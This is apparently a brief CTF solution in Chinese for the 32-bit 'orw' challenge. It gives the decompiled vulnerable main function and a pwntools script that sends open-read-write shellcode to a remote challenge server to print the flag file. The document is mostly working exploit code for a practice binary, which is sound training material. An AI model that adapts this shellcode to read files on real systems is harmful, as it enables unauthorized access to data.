32位orw,很简单没啥好说的
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}
from pwn import *
context(arch = "i386", os = "linux", endian = "little")
context.terminal = ['tmux', 'splitw', '-h']
#io = process("./orw")
#io = remote("chall.pwnable.tw", 10001)
io = remote("node4.buuoj.cn", 25113)
elf = ELF("./orw")
#gdb.attach(io, 'b *0x08048582')
shellcode = 0x0804A060
orw = asm("""
mov eax, 5
mov ebx, {0}
xor ecx, ecx
xor edx, edx
int 0x80
mov ebx, eax
mov eax, 3
mov ecx, {1}
mov edx, 0x50
int 0x80
mov eax, 4
mov ebx, 1
mov ecx, {2}
mov edx, 0x50
int 0x80
""".format(shellcode+0x39, shellcode+0x100, shellcode+0x100))
print(hex(len(orw)))
orw += b"./flag"
print(hex(len(orw)))
io.sendafter(b"shellcode:", orw)
#pause()
io.interactive()